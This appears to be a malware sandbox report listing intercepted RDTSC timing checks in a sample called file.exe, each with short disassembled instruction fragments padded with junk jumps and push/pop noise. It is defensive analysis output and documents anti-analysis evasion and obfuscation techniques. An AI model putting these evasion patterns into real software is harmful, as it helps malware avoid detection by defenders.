Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6018B second address: 4F601DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB80D16EFDBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FB80D16EFE6h 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov ebx, esi 0x0000001a movzx eax, dx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov di, si 0x00000025 call 00007FB80D16EFDAh 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F70361 second address: 4F70370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB80CDA387Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F70370 second address: 4F703A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB80D16EFDCh 0x00000010 add cl, 00000048h 0x00000013 jmp 00007FB80D16EFDBh 0x00000018 popfd 0x00000019 movzx eax, bx 0x0000001c popad 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F703A5 second address: 4F703BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F703BD second address: 4F703C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F703C1 second address: 4F703D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F703D1 second address: 4F703D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50416 second address: 4F50432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3888h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60D58 second address: 4F60DCA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB80D16EFE2h 0x00000008 or si, 5398h 0x0000000d jmp 00007FB80D16EFDBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FB80D16EFE6h 0x0000001c push eax 0x0000001d pushad 0x0000001e jmp 00007FB80D16EFE1h 0x00000023 mov bl, al 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FB80D16EFE3h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60DCA second address: 4F60DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60DCE second address: 4F60DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60DD4 second address: 4F60E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB80CDA3888h 0x00000009 sub ax, 69E8h 0x0000000e jmp 00007FB80CDA387Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FB80CDA3888h 0x0000001a add ax, FC48h 0x0000001f jmp 00007FB80CDA387Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bh, 56h 0x0000002e jmp 00007FB80CDA387Ch 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F70155 second address: 4F70165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F70165 second address: 4F70169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F70169 second address: 4F70197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FB80D16EFDCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FB80D16EFDDh 0x00000019 mov esi, 00CF1C47h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F70197 second address: 4F701B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3888h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F701B3 second address: 4F701B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F906A4 second address: 4F906BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F906BC second address: 4F90730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007FB80D16EFDFh 0x00000012 mov ch, BBh 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a pushfd 0x0000001b jmp 00007FB80D16EFE9h 0x00000020 or esi, 60F8B146h 0x00000026 jmp 00007FB80D16EFE1h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 mov ecx, ebx 0x00000032 popad 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB80D16EFDCh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90730 second address: 4F9073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9073F second address: 4F90757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90757 second address: 4F9075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9075B second address: 4F90783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB80D16EFE9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90783 second address: 4F90798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90798 second address: 4F907DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB80D16EFDCh 0x00000015 jmp 00007FB80D16EFE5h 0x0000001a popfd 0x0000001b mov ah, F5h 0x0000001d popad 0x0000001e test eax, eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F907DE second address: 4F90831 instructions: 0x00000000 rdtsc 0x00000002 call 00007FB80CDA387Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007FB80CDA3889h 0x00000010 or ecx, 6CC7D2E6h 0x00000016 jmp 00007FB80CDA3881h 0x0000001b popfd 0x0000001c popad 0x0000001d je 00007FB87ED369BBh 0x00000023 pushad 0x00000024 mov si, E7B3h 0x00000028 push eax 0x00000029 push edx 0x0000002a mov di, ax 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90831 second address: 4F90884 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ecx, eax 0x0000000a jmp 00007FB80D16EFDCh 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 jmp 00007FB80D16EFE1h 0x00000017 and ecx, 1Fh 0x0000001a jmp 00007FB80D16EFDEh 0x0000001f ror eax, cl 0x00000021 pushad 0x00000022 mov bh, ah 0x00000024 pushad 0x00000025 mov bx, CD5Ch 0x00000029 movsx edx, ax 0x0000002c popad 0x0000002d popad 0x0000002e leave 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov eax, 284E9ABFh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90884 second address: 4F908B3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 34DC23DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, 7FEF22B7h 0x0000000e popad 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [01012014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FB810D6411Ch 0x0000002a push FFFFFFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB80CDA3889h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F908B3 second address: 4F908F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FB80D16EFDEh 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FB81112F8B7h 0x00000017 mov edi, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB80D16EFE7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4002C second address: 4F40081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007FB80CDA3880h 0x0000000c or cx, 1A38h 0x00000011 jmp 00007FB80CDA387Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FB80CDA3889h 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB80CDA387Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40081 second address: 4F400B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FB80D16EFDEh 0x00000010 and esp, FFFFFFF8h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB80D16EFDAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F400B7 second address: 4F400BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F400BD second address: 4F40140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FB80D16EFE0h 0x0000000f push eax 0x00000010 jmp 00007FB80D16EFDBh 0x00000015 xchg eax, ecx 0x00000016 jmp 00007FB80D16EFE6h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushad 0x0000001e push edi 0x0000001f pop esi 0x00000020 mov cx, dx 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007FB80D16EFE0h 0x0000002b xchg eax, ebx 0x0000002c jmp 00007FB80D16EFE0h 0x00000031 mov ebx, dword ptr [ebp+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB80D16EFDAh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40140 second address: 4F4014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4014F second address: 4F40188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b jmp 00007FB80D16EFDAh 0x00000010 mov dword ptr [esp], esi 0x00000013 jmp 00007FB80D16EFE0h 0x00000018 mov esi, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FB80D16EFDAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40188 second address: 4F4018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4018C second address: 4F40192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40192 second address: 4F401BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e movzx esi, dx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB80CDA387Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F401BB second address: 4F401C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F401C1 second address: 4F401F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FB80CDA3886h 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, C4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F401F0 second address: 4F40237 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FB80D16EFE5h 0x0000000c add al, FFFFFFA6h 0x0000000f jmp 00007FB80D16EFE1h 0x00000014 popfd 0x00000015 popad 0x00000016 je 00007FB87F14D3C9h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FB80D16EFDDh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40237 second address: 4F4026F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, AA92h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000013 pushad 0x00000014 jmp 00007FB80CDA387Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b call 00007FB80CDA3886h 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F307CE second address: 4F307E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F308F6 second address: 4F30942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 pushad 0x00000011 mov dx, cx 0x00000014 mov dh, cl 0x00000016 popad 0x00000017 popad 0x00000018 mov ebx, 00000000h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FB80CDA3889h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30942 second address: 4F30972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB80D16EFE3h 0x00000013 mov ch, B2h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30972 second address: 4F30A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB87ED8927Ch 0x0000000f jmp 00007FB80CDA3880h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c mov dh, ah 0x0000001e pushfd 0x0000001f jmp 00007FB80CDA3883h 0x00000024 sub esi, 455DCE8Eh 0x0000002a jmp 00007FB80CDA3889h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ecx, esi 0x00000033 jmp 00007FB80CDA387Eh 0x00000038 je 00007FB87ED8922Ch 0x0000003e jmp 00007FB80CDA3880h 0x00000043 test byte ptr [76FA6968h], 00000002h 0x0000004a jmp 00007FB80CDA3880h 0x0000004f jne 00007FB87ED89212h 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30A26 second address: 4F30A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30A2A second address: 4F30A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30A47 second address: 4F30A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30A57 second address: 4F30A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30A5B second address: 4F30AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FB80D16EFE7h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov edx, ecx 0x00000014 mov di, si 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FB80D16EFDDh 0x0000001e xchg eax, ebx 0x0000001f jmp 00007FB80D16EFDEh 0x00000024 xchg eax, ebx 0x00000025 jmp 00007FB80D16EFE0h 0x0000002a push eax 0x0000002b pushad 0x0000002c mov eax, ebx 0x0000002e pushfd 0x0000002f jmp 00007FB80D16EFDDh 0x00000034 add al, 00000056h 0x00000037 jmp 00007FB80D16EFE1h 0x0000003c popfd 0x0000003d popad 0x0000003e xchg eax, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FB80D16EFDDh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30AEB second address: 4F30B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB80CDA3883h 0x00000015 sub ax, 56EEh 0x0000001a jmp 00007FB80CDA3889h 0x0000001f popfd 0x00000020 jmp 00007FB80CDA3880h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30B91 second address: 4F30B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30B95 second address: 4F30B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30B9B second address: 4F30BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB80D16EFE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30BB2 second address: 4F30BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 jmp 00007FB80CDA387Eh 0x0000000d pop ebx 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 mov eax, 1FD05D59h 0x00000016 popad 0x00000017 mov esp, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e call 00007FB80CDA3887h 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30BF2 second address: 4F30BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C0B second address: 4F40C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB80CDA3882h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bl, 76h 0x00000011 mov cl, 48h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40997 second address: 4F4099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4099B second address: 4F409A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F409A1 second address: 4F409C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov bx, 40C0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB80D16EFE5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F409C6 second address: 4F40A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007FB80CDA3883h 0x0000000b add si, 674Eh 0x00000010 jmp 00007FB80CDA3889h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FB80CDA387Eh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40A18 second address: 4F40A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40A1C second address: 4F40A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40A20 second address: 4F40A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40A26 second address: 4F40A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3884h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40A45 second address: 4F40A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40A49 second address: 4F40A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB08D7 second address: 4FB0900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F99Ah 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jmp 00007FB80D16EFDAh 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB80D16EFDAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0900 second address: 4FB090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB090F second address: 4FB0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0915 second address: 4FB0919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
